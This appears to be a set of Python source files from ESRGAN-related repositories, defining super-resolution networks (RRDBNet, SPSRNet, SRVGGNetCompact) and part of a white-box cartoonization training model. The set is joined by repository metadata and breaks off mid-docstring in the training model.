from collections import OrderedDict
import torch
import torch.nn as nn
import utils.architecture.block as B
# Borrowed from https://github.com/rlaphoenix/VSGAN/blob/master/vsgan/archs/ESRGAN.py
# Which enhanced stuff that was already here
class RRDBNet(nn.Module):
def __init__(
self,
state_dict,
norm=None,
act: str = "leakyrelu",
upsampler: str = "upconv",
mode: str = "CNA",
) -> None:
"""
ESRGAN - Enhanced Super-Resolution Generative Adversarial Networks.
By <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>,
and <NAME>.
This is old-arch Residual in Residual Dense Block Network and is not
the newest revision that's available at github.com/xinntao/ESRGAN.
        This is intentional: the newest network has severely limited the
        potential uses of the network with no benefit.
This network supports model files from both new and old-arch.
Args:
norm: Normalization layer
act: Activation layer
upsampler: Upsample layer. upconv, pixel_shuffle
mode: Convolution mode
"""
super(RRDBNet, self).__init__()
self.state = state_dict
self.norm = norm
self.act = act
self.upsampler = upsampler
self.mode = mode
self.state_map = {
# currently supports old, new, and newer RRDBNet arch models
# ESRGAN, BSRGAN/RealSR, Real-ESRGAN
"model.0.weight": ("conv_first.weight",),
"model.0.bias": ("conv_first.bias",),
"model.1.sub./NB/.weight": ("trunk_conv.weight", "conv_body.weight"),
"model.1.sub./NB/.bias": ("trunk_conv.bias", "conv_body.bias"),
"model.3.weight": ("upconv1.weight", "conv_up1.weight"),
"model.3.bias": ("upconv1.bias", "conv_up1.bias"),
"model.6.weight": ("upconv2.weight", "conv_up2.weight"),
"model.6.bias": ("upconv2.bias", "conv_up2.bias"),
"model.8.weight": ("HRconv.weight", "conv_hr.weight"),
"model.8.bias": ("HRconv.bias", "conv_hr.bias"),
"model.10.weight": ("conv_last.weight",),
"model.10.bias": ("conv_last.bias",),
r"model.1.sub.\1.RDB\2.conv\3.0.\4": (
r"RRDB_trunk\.(\d+)\.RDB(\d)\.conv(\d+)\.(weight|bias)",
r"body\.(\d+)\.rdb(\d)\.conv(\d+)\.(weight|bias)",
),
}
if "params_ema" in self.state:
self.state = self.state["params_ema"]
self.num_blocks = self.get_num_blocks()
self.plus = any("conv1x1" in k for k in self.state.keys())
self.state = self.new_to_old_arch(self.state)
self.key_arr = list(self.state.keys())
# print(self.key_arr)
self.in_nc = self.state[self.key_arr[0]].shape[1]
self.out_nc = self.state[self.key_arr[-1]].shape[0]
self.scale = self.get_scale()
self.num_filters = self.state[self.key_arr[0]].shape[0]
c2x2 = False
if self.state["model.0.weight"].shape[-2] == 2:
c2x2 = True
self.scale = math.ceil(self.scale ** (1.0 / 3))
# Detect if pixelunshuffle was used (Real-ESRGAN)
if self.in_nc in (self.out_nc * 4, self.out_nc * 16) and self.out_nc in (
self.in_nc / 4,
self.in_nc / 16,
):
self.shuffle_factor = int(math.sqrt(self.in_nc / self.out_nc))
else:
self.shuffle_factor = None
upsample_block = {
"upconv": B.upconv_block,
"pixel_shuffle": B.pixelshuffle_block,
}.get(self.upsampler)
if upsample_block is None:
raise NotImplementedError(f"Upsample mode [{self.upsampler}] is not found")
if self.scale == 3:
upsample_blocks = upsample_block(
in_nc=self.num_filters,
out_nc=self.num_filters,
upscale_factor=3,
act_type=self.act,
c2x2=c2x2,
)
else:
upsample_blocks = [
upsample_block(
in_nc=self.num_filters,
out_nc=self.num_filters,
act_type=self.act,
c2x2=c2x2,
)
for _ in range(int(math.log(self.scale, 2)))
]
self.model = B.sequential(
# fea conv
B.conv_block(
in_nc=self.in_nc,
out_nc=self.num_filters,
kernel_size=3,
norm_type=None,
act_type=None,
c2x2=c2x2,
),
B.ShortcutBlock(
B.sequential(
# rrdb blocks
*[
B.RRDB(
nf=self.num_filters,
kernel_size=3,
gc=32,
stride=1,
bias=True,
pad_type="zero",
norm_type=self.norm,
act_type=self.act,
mode="CNA",
plus=self.plus,
c2x2=c2x2,
)
for _ in range(self.num_blocks)
],
# lr conv
B.conv_block(
in_nc=self.num_filters,
out_nc=self.num_filters,
kernel_size=3,
norm_type=self.norm,
act_type=None,
mode=self.mode,
c2x2=c2x2,
),
)
),
*upsample_blocks,
# hr_conv0
B.conv_block(
in_nc=self.num_filters,
out_nc=self.num_filters,
kernel_size=3,
norm_type=None,
act_type=self.act,
c2x2=c2x2,
),
# hr_conv1
B.conv_block(
in_nc=self.num_filters,
out_nc=self.out_nc,
kernel_size=3,
norm_type=None,
act_type=None,
c2x2=c2x2,
),
)
self.load_state_dict(self.state, strict=False)
def new_to_old_arch(self, state):
"""Convert a new-arch model state dictionary to an old-arch dictionary."""
if "params_ema" in state:
state = state["params_ema"]
if "conv_first.weight" not in state:
# model is already old arch, this is a loose check, but should be sufficient
return state
# add nb to state keys
for kind in ("weight", "bias"):
self.state_map[f"model.1.sub.{self.num_blocks}.{kind}"] = self.state_map[
f"model.1.sub./NB/.{kind}"
]
del self.state_map[f"model.1.sub./NB/.{kind}"]
old_state = OrderedDict()
for old_key, new_keys in self.state_map.items():
for new_key in new_keys:
if r"\1" in old_key:
for k, v in state.items():
sub = re.sub(new_key, old_key, k)
if sub != k:
old_state[sub] = v
else:
if new_key in state:
old_state[old_key] = state[new_key]
# Sort by first numeric value of each layer
def compare(item1, item2):
parts1 = item1.split(".")
parts2 = item2.split(".")
int1 = int(parts1[1])
int2 = int(parts2[1])
return int1 - int2
sorted_keys = sorted(old_state.keys(), key=functools.cmp_to_key(compare))
# Rebuild the output dict in the right order
out_dict = OrderedDict((k, old_state[k]) for k in sorted_keys)
return out_dict
def get_scale(self, min_part: int = 6) -> int:
n = 0
for part in list(self.state):
parts = part.split(".")[1:]
if len(parts) == 2:
part_num = int(parts[0])
if part_num > min_part and parts[1] == "weight":
n += 1
return 2**n
def get_num_blocks(self) -> int:
nbs = []
state_keys = self.state_map[r"model.1.sub.\1.RDB\2.conv\3.0.\4"] + (
r"model\.\d+\.sub\.(\d+)\.RDB(\d+)\.conv(\d+)\.0\.(weight|bias)",
)
for state_key in state_keys:
for k in self.state:
m = re.search(state_key, k)
if m:
nbs.append(int(m.group(1)))
if nbs:
break
return max(*nbs) + 1
def forward(self, x):
if self.shuffle_factor:
x = torch.pixel_unshuffle(x, downscale_factor=self.shuffle_factor)
return self.model(x)
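# --- Illustrative usage sketch (added for clarity; not part of the original file) ---
# Shows how this class is typically constructed from a saved ESRGAN-style state dict
# and used for inference. The model path is a placeholder assumption; any old- or
# new-arch RRDB .pth file should work, and the repository root must be on sys.path
# so that `utils.architecture.block` resolves.
if __name__ == "__main__":
    state_dict = torch.load("4x_example_model.pth", map_location="cpu")
    model = RRDBNet(state_dict).eval()
    lr_image = torch.rand(1, model.in_nc, 64, 64)  # stand-in for a real LR image tensor
    with torch.no_grad():
        sr_image = model(lr_image)
    print(sr_image.shape)  # e.g. [1, out_nc, 64 * scale, 64 * scale]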
``` |
{
"source": "JoeyBallentine/ESRGAN",
"score": 2
} |
#### File: utils/architecture/SPSR.py
```python
import math
import re
from collections import OrderedDict
from typing import Optional
import torch
import torch.nn as nn
import torch.nn.functional as F
import utils.architecture.block as B
from torch import Tensor
STATE_T = OrderedDict[str, Tensor]
class Get_gradient_nopadding(nn.Module):
def __init__(self):
super(Get_gradient_nopadding, self).__init__()
kernel_v = [[0, -1, 0], [0, 0, 0], [0, 1, 0]]
kernel_h = [[0, 0, 0], [-1, 0, 1], [0, 0, 0]]
kernel_h = torch.FloatTensor(kernel_h).unsqueeze(0).unsqueeze(0)
kernel_v = torch.FloatTensor(kernel_v).unsqueeze(0).unsqueeze(0)
self.weight_h = nn.Parameter(data=kernel_h, requires_grad=False)
self.weight_v = nn.Parameter(data=kernel_v, requires_grad=False)
def forward(self, x):
x_list = []
for i in range(x.shape[1]):
x_i = x[:, i]
x_i_v = F.conv2d(x_i.unsqueeze(1), self.weight_v, padding=1)
x_i_h = F.conv2d(x_i.unsqueeze(1), self.weight_h, padding=1)
x_i = torch.sqrt(torch.pow(x_i_v, 2) + torch.pow(x_i_h, 2) + 1e-6)
x_list.append(x_i)
x = torch.cat(x_list, dim=1)
return x
class SPSRNet(nn.Module):
def __init__(
self,
state_dict: STATE_T,
norm=None,
act: str = "leakyrelu",
upsampler: str = "upconv",
mode: str = "CNA",
):
super(SPSRNet, self).__init__()
self.state = state_dict
self.norm = norm
self.act = act
self.upsampler = upsampler
self.mode = mode
self.num_blocks = self.get_num_blocks()
self.in_nc = self.state["model.0.weight"].shape[1]
self.out_nc = self.state["f_HR_conv1.0.bias"].shape[0]
self.scale = self.get_scale(4)
print(self.scale)
self.num_filters = self.state["model.0.weight"].shape[0]
n_upscale = int(math.log(self.scale, 2))
if self.scale == 3:
n_upscale = 1
fea_conv = B.conv_block(
self.in_nc, self.num_filters, kernel_size=3, norm_type=None, act_type=None
)
rb_blocks = [
B.RRDB(
self.num_filters,
kernel_size=3,
gc=32,
stride=1,
bias=True,
pad_type="zero",
norm_type=norm,
act_type=act,
mode="CNA",
)
for _ in range(self.num_blocks)
]
LR_conv = B.conv_block(
self.num_filters,
self.num_filters,
kernel_size=3,
norm_type=norm,
act_type=None,
mode=mode,
)
if upsampler == "upconv":
upsample_block = B.upconv_block
elif upsampler == "pixelshuffle":
upsample_block = B.pixelshuffle_block
else:
raise NotImplementedError(f"upsample mode [{upsampler}] is not found")
if self.scale == 3:
a_upsampler = upsample_block(
self.num_filters, self.num_filters, 3, act_type=act
)
else:
a_upsampler = [
upsample_block(self.num_filters, self.num_filters, act_type=act)
for _ in range(n_upscale)
]
self.HR_conv0_new = B.conv_block(
self.num_filters,
self.num_filters,
kernel_size=3,
norm_type=None,
act_type=act,
)
self.HR_conv1_new = B.conv_block(
self.num_filters,
self.num_filters,
kernel_size=3,
norm_type=None,
act_type=None,
)
self.model = B.sequential(
fea_conv,
B.ShortcutBlockSPSR(B.sequential(*rb_blocks, LR_conv)),
*a_upsampler,
self.HR_conv0_new,
)
self.get_g_nopadding = Get_gradient_nopadding()
self.b_fea_conv = B.conv_block(
self.in_nc, self.num_filters, kernel_size=3, norm_type=None, act_type=None
)
self.b_concat_1 = B.conv_block(
2 * self.num_filters,
self.num_filters,
kernel_size=3,
norm_type=None,
act_type=None,
)
self.b_block_1 = B.RRDB(
self.num_filters * 2,
kernel_size=3,
gc=32,
stride=1,
bias=True,
pad_type="zero",
norm_type=norm,
act_type=act,
mode="CNA",
)
self.b_concat_2 = B.conv_block(
2 * self.num_filters,
self.num_filters,
kernel_size=3,
norm_type=None,
act_type=None,
)
self.b_block_2 = B.RRDB(
self.num_filters * 2,
kernel_size=3,
gc=32,
stride=1,
bias=True,
pad_type="zero",
norm_type=norm,
act_type=act,
mode="CNA",
)
self.b_concat_3 = B.conv_block(
2 * self.num_filters,
self.num_filters,
kernel_size=3,
norm_type=None,
act_type=None,
)
self.b_block_3 = B.RRDB(
self.num_filters * 2,
kernel_size=3,
gc=32,
stride=1,
bias=True,
pad_type="zero",
norm_type=norm,
act_type=act,
mode="CNA",
)
self.b_concat_4 = B.conv_block(
2 * self.num_filters,
self.num_filters,
kernel_size=3,
norm_type=None,
act_type=None,
)
self.b_block_4 = B.RRDB(
self.num_filters * 2,
kernel_size=3,
gc=32,
stride=1,
bias=True,
pad_type="zero",
norm_type=norm,
act_type=act,
mode="CNA",
)
self.b_LR_conv = B.conv_block(
self.num_filters,
self.num_filters,
kernel_size=3,
norm_type=norm,
act_type=None,
mode=mode,
)
if upsampler == "upconv":
upsample_block = B.upconv_block
elif upsampler == "pixelshuffle":
upsample_block = B.pixelshuffle_block
else:
raise NotImplementedError(f"upsample mode [{upsampler}] is not found")
if self.scale == 3:
b_upsampler = upsample_block(
self.num_filters, self.num_filters, 3, act_type=act
)
else:
b_upsampler = [
upsample_block(self.num_filters, self.num_filters, act_type=act)
for _ in range(n_upscale)
]
b_HR_conv0 = B.conv_block(
self.num_filters,
self.num_filters,
kernel_size=3,
norm_type=None,
act_type=act,
)
b_HR_conv1 = B.conv_block(
self.num_filters,
self.num_filters,
kernel_size=3,
norm_type=None,
act_type=None,
)
self.b_module = B.sequential(*b_upsampler, b_HR_conv0, b_HR_conv1)
self.conv_w = B.conv_block(
self.num_filters, self.out_nc, kernel_size=1, norm_type=None, act_type=None
)
self.f_concat = B.conv_block(
self.num_filters * 2,
self.num_filters,
kernel_size=3,
norm_type=None,
act_type=None,
)
self.f_block = B.RRDB(
self.num_filters * 2,
kernel_size=3,
gc=32,
stride=1,
bias=True,
pad_type="zero",
norm_type=norm,
act_type=act,
mode="CNA",
)
self.f_HR_conv0 = B.conv_block(
self.num_filters,
self.num_filters,
kernel_size=3,
norm_type=None,
act_type=act,
)
self.f_HR_conv1 = B.conv_block(
self.num_filters, self.out_nc, kernel_size=3, norm_type=None, act_type=None
)
self.load_state_dict(self.state, strict=False)
def get_scale(self, min_part: int = 4) -> int:
n = 0
for part in list(self.state):
parts = part.split(".")
if len(parts) == 3:
part_num = int(parts[1])
if part_num > min_part and parts[0] == "model" and parts[2] == "weight":
n += 1
return 2 ** n
def get_num_blocks(self) -> int:
nb = 0
for part in list(self.state):
parts = part.split(".")
n_parts = len(parts)
if n_parts == 5 and parts[2] == "sub":
nb = int(parts[3])
return nb
def forward(self, x):
x_grad = self.get_g_nopadding(x)
x = self.model[0](x)
x, block_list = self.model[1](x)
x_ori = x
for i in range(5):
x = block_list[i](x)
x_fea1 = x
for i in range(5):
x = block_list[i + 5](x)
x_fea2 = x
for i in range(5):
x = block_list[i + 10](x)
x_fea3 = x
for i in range(5):
x = block_list[i + 15](x)
x_fea4 = x
x = block_list[20:](x)
# short cut
x = x_ori + x
x = self.model[2:](x)
x = self.HR_conv1_new(x)
x_b_fea = self.b_fea_conv(x_grad)
x_cat_1 = torch.cat([x_b_fea, x_fea1], dim=1)
x_cat_1 = self.b_block_1(x_cat_1)
x_cat_1 = self.b_concat_1(x_cat_1)
x_cat_2 = torch.cat([x_cat_1, x_fea2], dim=1)
x_cat_2 = self.b_block_2(x_cat_2)
x_cat_2 = self.b_concat_2(x_cat_2)
x_cat_3 = torch.cat([x_cat_2, x_fea3], dim=1)
x_cat_3 = self.b_block_3(x_cat_3)
x_cat_3 = self.b_concat_3(x_cat_3)
x_cat_4 = torch.cat([x_cat_3, x_fea4], dim=1)
x_cat_4 = self.b_block_4(x_cat_4)
x_cat_4 = self.b_concat_4(x_cat_4)
x_cat_4 = self.b_LR_conv(x_cat_4)
# short cut
x_cat_4 = x_cat_4 + x_b_fea
x_branch = self.b_module(x_cat_4)
# x_out_branch = self.conv_w(x_branch)
########
x_branch_d = x_branch
x_f_cat = torch.cat([x_branch_d, x], dim=1)
x_f_cat = self.f_block(x_f_cat)
x_out = self.f_concat(x_f_cat)
x_out = self.f_HR_conv0(x_out)
x_out = self.f_HR_conv1(x_out)
#########
# return x_out_branch, x_out, x_grad
return x_out
``` |
{
"source": "joeyballentine/ESRGAN",
"score": 3
} |
#### File: utils/architecture/SRVGG.py
```python
import math
from collections import OrderedDict
from typing import Union
import torch.nn as nn
import torch.nn.functional as F
from torch import Tensor
class SRVGGNetCompact(nn.Module):
"""A compact VGG-style network structure for super-resolution.
    It is a compact network structure that performs upsampling in the last layer; no convolution is
    conducted on the HR feature space.
Args:
num_in_ch (int): Channel number of inputs. Default: 3.
num_out_ch (int): Channel number of outputs. Default: 3.
num_feat (int): Channel number of intermediate features. Default: 64.
num_conv (int): Number of convolution layers in the body network. Default: 16.
upscale (int): Upsampling factor. Default: 4.
act_type (str): Activation type, options: 'relu', 'prelu', 'leakyrelu'. Default: prelu.
"""
def __init__(
self,
state_dict,
act_type: str = "prelu",
):
super(SRVGGNetCompact, self).__init__()
self.act_type = act_type
self.state = state_dict
if "params" in self.state:
self.state = self.state["params"]
self.key_arr = list(self.state.keys())
self.num_in_ch = self.get_in_nc()
self.num_feat = self.get_num_feats()
self.num_conv = self.get_num_conv()
self.num_out_ch = self.num_in_ch # :(
self.scale = self.get_scale()
self.body = nn.ModuleList()
# the first conv
self.body.append(nn.Conv2d(self.num_in_ch, self.num_feat, 3, 1, 1))
# the first activation
if act_type == "relu":
activation = nn.ReLU(inplace=True)
elif act_type == "prelu":
activation = nn.PReLU(num_parameters=self.num_feat)
elif act_type == "leakyrelu":
activation = nn.LeakyReLU(negative_slope=0.1, inplace=True)
self.body.append(activation)
# the body structure
for _ in range(self.num_conv):
self.body.append(nn.Conv2d(self.num_feat, self.num_feat, 3, 1, 1))
# activation
if act_type == "relu":
activation = nn.ReLU(inplace=True)
elif act_type == "prelu":
activation = nn.PReLU(num_parameters=self.num_feat)
elif act_type == "leakyrelu":
activation = nn.LeakyReLU(negative_slope=0.1, inplace=True)
self.body.append(activation)
# the last conv
self.body.append(nn.Conv2d(self.num_feat, self.pixelshuffle_shape, 3, 1, 1))
# upsample
self.upsampler = nn.PixelShuffle(self.scale)
self.load_state_dict(self.state, strict=False)
def get_num_conv(self) -> int:
return (int(self.key_arr[-1].split(".")[1]) - 2) // 2
def get_num_feats(self) -> int:
return self.state[self.key_arr[0]].shape[0]
def get_in_nc(self) -> int:
return self.state[self.key_arr[0]].shape[1]
def get_scale(self) -> int:
self.pixelshuffle_shape = self.state[self.key_arr[-1]].shape[0]
# Assume out_nc is the same as in_nc
        # I can't think of a better way to do that
self.num_out_ch = self.num_in_ch
scale = math.sqrt(self.pixelshuffle_shape / self.num_out_ch)
if scale - int(scale) > 0:
print(
"out_nc is probably different than in_nc, scale calculation might be wrong"
)
scale = int(scale)
return scale
def forward(self, x):
out = x
for i in range(0, len(self.body)):
out = self.body[i](out)
out = self.upsampler(out)
# add the nearest upsampled image, so that the network learns the residual
base = F.interpolate(x, scale_factor=self.scale, mode="nearest")
out += base
return out
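# --- Illustrative usage sketch (added for clarity; not part of the original file) ---
# Shows how a compact SRVGG state dict (e.g. a Real-ESRGAN "compact" model) might be
# loaded and run. The file name is a placeholder assumption.
if __name__ == "__main__":
    import torch  # the module above only imports torch.nn / torch.nn.functional
    state_dict = torch.load("compact_example_model.pth", map_location="cpu")
    model = SRVGGNetCompact(state_dict, act_type="prelu").eval()
    lr_image = torch.rand(1, model.num_in_ch, 64, 64)  # stand-in input tensor
    with torch.no_grad():
        sr_image = model(lr_image)
    print(sr_image.shape)  # roughly [1, num_out_ch, 64 * scale, 64 * scale]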
``` |
{
"source": "JoeyBallentine/traiNNer",
"score": 2
} |
#### File: codes/models/wbc_model.py
```python
from __future__ import absolute_import
import os
import logging
from collections import OrderedDict
import itertools
import torch
import torch.nn as nn
from joblib import Parallel, delayed, parallel_backend
import models.networks as networks
from .base_model import BaseModel, nullcast
from . import losses
from . import optimizers
from . import schedulers
from . import swa
from dataops.batchaug import BatchAug
from dataops.filters import FilterHigh, FilterLow, GuidedFilter # , FilterX
from dataops.colors import ColorShift
from dataops.augmennt.augmennt import transforms
from dataops.common import tensor2np, np2tensor
from utils.image_pool import ImagePool
logger = logging.getLogger('base')
load_amp = (hasattr(torch.cuda, "amp") and hasattr(torch.cuda.amp, "autocast"))
if load_amp:
from torch.cuda.amp import autocast, GradScaler
logger.info('AMP library available')
else:
logger.info('AMP library not available')
# TODO: can move to some common module and reuse for other fns
def batch_superpixel(batch_image: torch.Tensor,
superpixel_fn: callable, num_job:int=None) -> torch.Tensor:
""" Convert a batch of images to superpixel in parallel
Args:
batch_image: the batch of images. Shape must be [b,c,h,w]
superpixel_fn: the callable function to apply in parallel
num_job: the number of threads to parallelize on. Default: will
use as many threads as the batch size 'b'.
Returns:
superpixel tensor, shape = [b,c,h,w]
"""
if not num_job:
num_job = batch_image.shape[0]
with parallel_backend('threading', n_jobs=num_job):
batch_out = Parallel()(delayed(superpixel_fn)
(image) for image in batch_image)
return torch.stack(batch_out, dim=0)
def get_sp_transform(train_opt:dict, znorm:bool=True):
n_segments = train_opt.get('sp_n_segments', 200) # 500
max_size = train_opt.get('sp_max_size', None) # crop_size
# 'selective' 'cluster' 'rag' None
reduction = train_opt.get('sp_reduction', 'selective')
# 'seeds', 'slic', 'slico', 'mslic', 'sk_slic', 'sk_felzenszwalb'
algo = train_opt.get('sp_algo', 'sk_felzenszwalb')
gamma_range = train_opt.get('sp_gamma_range', (100, 120))
superpixel_fn = transforms.Compose([
transforms.Lambda(lambda img: tensor2np(img, rgb2bgr=True,
denormalize=znorm, remove_batch=False)),
transforms.Superpixels(
p_replace=1, n_segments=n_segments, algo=algo,
reduction=reduction, max_size=max_size, p=1),
transforms.RandomGamma(gamma_range=gamma_range, gain=1, p=1),
transforms.Lambda(lambda img: np2tensor(img, bgr2rgb=True,
normalize=znorm, add_batch=False))
])
return superpixel_fn
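# --- Illustrative usage sketch (added for clarity; not part of the original file) ---
# Shows how the two helpers above are combined, mirroring what WBCModel.forward()
# does during training: build the superpixel transform from the training options,
# then apply it to a whole batch in parallel. The option values and the random
# batch are assumptions for illustration only.
if __name__ == "__main__":
    example_train_opt = {'sp_n_segments': 200, 'sp_algo': 'sk_felzenszwalb'}
    sp_fn = get_sp_transform(example_train_opt, znorm=True)
    fake_batch = torch.rand(4, 3, 64, 64)  # stand-in for a batch of generated images
    sp_batch = batch_superpixel(fake_batch, sp_fn)
    print(sp_batch.shape)  # [4, 3, 64, 64]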
class WBCModel(BaseModel):
""" This class implements the white-box cartoonization (WBC) model,
for learning image-to-image translation from A (source domain) to B
(target domain) without paired data.
WBC paper:
https://systemerrorwang.github.io/White-box-Cartoonization/paper/06791.pdf
"""
def __init__(self, opt):
"""Initialize the WBC model class.
Parameters:
opt (Option dictionary): stores all the experiment flags
"""
super(WBCModel, self).__init__(opt)
train_opt = opt['train']
# fetch lambda_idt if provided for identity loss
self.lambda_idt = train_opt['lambda_identity']
# specify the images you want to save/display. The training/test
# scripts will call <BaseModel.get_current_visuals>
self.visual_names = ['real_A', 'fake_B', 'real_B']
if self.is_train and self.lambda_idt and self.lambda_idt > 0.0:
# if identity loss is used, we also visualize idt_B=G(B)
self.visual_names.append('idt_B')
# specify the models you want to load/save to the disk.
# The training/test scripts will call <BaseModel.save_networks> and <BaseModel.load_networks>
# for training and testing, a generator 'G' is needed
self.model_names = ['G']
# define networks (both generator and discriminator) and load pretrained models
self.netG = networks.define_G(opt).to(self.device) # G
if self.is_train:
self.netG.train()
if train_opt['gan_weight']:
# add discriminators to the network list
self.model_names.append('D_S') # surface
self.model_names.append('D_T') # texture
self.netD_S = networks.define_D(opt).to(self.device)
t_opt = opt.copy() # TODO: tmp to reuse same config.
t_opt['network_D']['input_nc'] = 1
self.netD_T = networks.define_D(t_opt).to(self.device)
self.netD_T.train()
self.netD_S.train()
self.load() # load 'G', 'D_T' and 'D_S' if needed
# additional WBC component, initial guided filter
#TODO: parameters for GFs can be in options file
self.guided_filter = GuidedFilter(r=1, eps=1e-2)
if self.is_train:
if self.lambda_idt and self.lambda_idt > 0.0:
# only works when input and output images have the same
# number of channels
assert opt['input_nc'] == opt['output_nc']
# create image buffers to store previously generated images
self.fake_S_pool = ImagePool(opt['pool_size'])
self.fake_T_pool = ImagePool(opt['pool_size'])
# Setup batch augmentations
#TODO: test
self.mixup = train_opt.get('mixup', None)
if self.mixup:
self.mixopts = train_opt.get('mixopts', ["blend", "rgb", "mixup", "cutmix", "cutmixup"]) # , "cutout", "cutblur"]
self.mixprob = train_opt.get('mixprob', [1.0, 1.0, 1.0, 1.0, 1.0]) # , 1.0, 1.0]
self.mixalpha = train_opt.get('mixalpha', [0.6, 1.0, 1.2, 0.7, 0.7]) # , 0.001, 0.7]
self.aux_mixprob = train_opt.get('aux_mixprob', 1.0)
self.aux_mixalpha = train_opt.get('aux_mixalpha', 1.2)
self.mix_p = train_opt.get('mix_p', None)
# Setup frequency separation
self.fs = train_opt.get('fs', None)
self.f_low = None
self.f_high = None
if self.fs:
lpf_type = train_opt.get('lpf_type', "average")
hpf_type = train_opt.get('hpf_type', "average")
self.f_low = FilterLow(filter_type=lpf_type).to(self.device)
self.f_high = FilterHigh(filter_type=hpf_type).to(self.device)
# Initialize the losses with the opt parameters
# Generator losses:
# for the losses that don't require high precision (can use half precision)
self.generatorlosses = losses.GeneratorLoss(opt, self.device)
# for losses that need high precision (use out of the AMP context)
self.precisegeneratorlosses = losses.PreciseGeneratorLoss(opt, self.device)
# TODO: show the configured losses names in logger
# print(self.generatorlosses.loss_list)
# set filters losses for each representation
self.surf_losses = opt['train'].get('surf_losses', [])
self.text_losses = opt['train'].get('text_losses', [])
self.struct_losses = opt['train'].get('struct_losses', ['fea'])
self.cont_losses = opt['train'].get('cont_losses', ['fea'])
self.reg_losses = opt['train'].get('reg_losses', ['tv'])
# add identity loss if configured
self.idt_losses = []
if self.is_train and self.lambda_idt and self.lambda_idt > 0.0:
self.idt_losses = opt['train'].get('idt_losses', ['pix'])
# custom representations scales
self.stru_w = opt['train'].get('struct_scale', 1)
self.cont_w = opt['train'].get('content_scale', 1)
self.text_w = opt['train'].get('texture_scale', 1)
self.surf_w = opt['train'].get('surface_scale', 0.1)
self.reg_w = opt['train'].get('reg_scale', 1)
# additional WBC components
self.colorshift = ColorShift()
self.guided_filter_surf = GuidedFilter(r=5, eps=2e-1)
self.sp_transform = get_sp_transform(train_opt, opt['datasets']['train']['znorm'])
# Discriminator loss:
if train_opt['gan_type'] and train_opt['gan_weight']:
# TODO:
# self.criterionGAN = GANLoss(train_opt['gan_type'], 1.0, 0.0).to(self.device)
self.cri_gan = True
diffaug = train_opt.get('diffaug', None)
dapolicy = None
if diffaug: # TODO: this if should not be necessary
dapolicy = train_opt.get('dapolicy', 'color,translation,cutout') # original
self.adversarial = losses.Adversarial(
train_opt=train_opt, device=self.device,
diffaug=diffaug, dapolicy=dapolicy, conditional=False)
# TODO:
# D_update_ratio and D_init_iters are for WGAN
# self.D_update_ratio = train_opt.get('D_update_ratio', 1)
# self.D_init_iters = train_opt.get('D_init_iters', 0)
else:
self.cri_gan = False
# Initialize optimizers
self.optGstep = False
self.optDstep = False
if self.cri_gan:
# self.optimizers, self.optimizer_G, self.optimizer_D = optimizers.get_optimizers(
# self.cri_gan, [self.netD_T, self.netD_S], self.netG,
# train_opt, logger, self.optimizers)
self.optimizers, self.optimizer_G, self.optimizer_D = optimizers.get_optimizers(
cri_gan=self.cri_gan,
netG=self.netG,
optim_paramsD=itertools.chain(self.netD_T.parameters(), self.netD_S.parameters()),
train_opt=train_opt, logger=logger, optimizers=self.optimizers)
else:
self.optimizers, self.optimizer_G = optimizers.get_optimizers(
None, None, self.netG, train_opt, logger, self.optimizers)
self.optDstep = True
# Prepare schedulers
self.schedulers = schedulers.get_schedulers(
optimizers=self.optimizers, schedulers=self.schedulers, train_opt=train_opt)
# Configure SWA
self.swa = opt.get('use_swa', False)
if self.swa:
self.swa_start_iter = train_opt.get('swa_start_iter', 0)
# self.swa_start_epoch = train_opt.get('swa_start_epoch', None)
swa_lr = train_opt.get('swa_lr', 0.0001)
swa_anneal_epochs = train_opt.get('swa_anneal_epochs', 10)
swa_anneal_strategy = train_opt.get('swa_anneal_strategy', 'cos')
# TODO: Note: This could be done in resume_training() instead, to prevent creating
# the swa scheduler and model before they are needed
self.swa_scheduler, self.swa_model = swa.get_swa(
self.optimizer_G, self.netG, swa_lr, swa_anneal_epochs, swa_anneal_strategy)
self.load_swa() # load swa from resume state
logger.info('SWA enabled. Starting on iter: {}, lr: {}'.format(self.swa_start_iter, swa_lr))
# Configure virtual batch
batch_size = opt["datasets"]["train"]["batch_size"]
virtual_batch = opt["datasets"]["train"].get('virtual_batch_size', None)
        self.virtual_batch = virtual_batch if virtual_batch \
            and virtual_batch >= batch_size else batch_size
self.accumulations = self.virtual_batch // batch_size
self.optimizer_G.zero_grad()
if self.cri_gan:
self.optimizer_D.zero_grad()
# Configure AMP
self.amp = load_amp and opt.get('use_amp', False)
if self.amp:
self.cast = autocast
self.amp_scaler = GradScaler()
logger.info('AMP enabled')
else:
self.cast = nullcast
# Configure FreezeD
if self.cri_gan:
self.feature_loc = None
loc = train_opt.get('freeze_loc', False)
if loc:
disc = opt["network_D"].get('which_model_D', False)
if "discriminator_vgg" in disc and "fea" not in disc:
loc = (loc*3)-2
elif "patchgan" in disc:
loc = (loc*3)-1
# TODO: TMP, for now only tested with the vgg-like or patchgan discriminators
if "discriminator_vgg" in disc or "patchgan" in disc:
self.feature_loc = loc
logger.info('FreezeD enabled')
# create logs dictionaries
self.log_dict = OrderedDict()
self.log_dict_T = OrderedDict()
self.log_dict_S = OrderedDict()
self.print_network(verbose=False) # TODO: pass verbose flag from config file
def feed_data(self, data):
"""Unpack input data from the dataloader and perform necessary pre-processing steps.
Parameters:
data (dict): include the data itself and its metadata information.
The option 'direction' can be used to swap images in domain A and domain B.
"""
# TODO: images currently being flipped with BtoA during read, check logic
# AtoB = self.opt.get('direction') == 'AtoB'
# self.real_A = data['A' if AtoB else 'B'].to(self.device)
# self.real_B = data['B' if AtoB else 'A'].to(self.device)
# self.image_paths = data['A_path' if AtoB else 'B_path']
self.real_A = data['A'].to(self.device)
self.real_B = data['B'].to(self.device)
self.image_paths = data['A_path']
def forward(self):
"""Run forward pass; called by both functions <optimize_parameters> and <test>."""
fake_B = self.netG(self.real_A) # G(A)
self.fake_B = self.guided_filter(self.real_A, fake_B)
if self.is_train:
# generate representations images
# surface: fake_blur
self.fake_blur = self.guided_filter_surf(
self.fake_B, self.fake_B)
# surface: real_blur (cartoon)
self.real_blur = self.guided_filter_surf(
self.real_B, self.real_B)
# texture: fake_gray, real_gray (cartoon)
self.fake_gray, self.real_gray = self.colorshift(
self.fake_B, self.real_B)
# structure: get superpixels (sp_real)
self.sp_real = (
batch_superpixel(
self.fake_B.detach(), # self.real_A, #
self.sp_transform)
).to(self.device)
def backward_D_Basic(self, netD, real, fake, log_dict):
"""Calculate GAN loss for the discriminator
Parameters:
netD (network): the discriminator D
real (tensor array): real images
fake (tensor array): images generated by a generator
        Returns the updated log dictionary (the discriminator loss itself
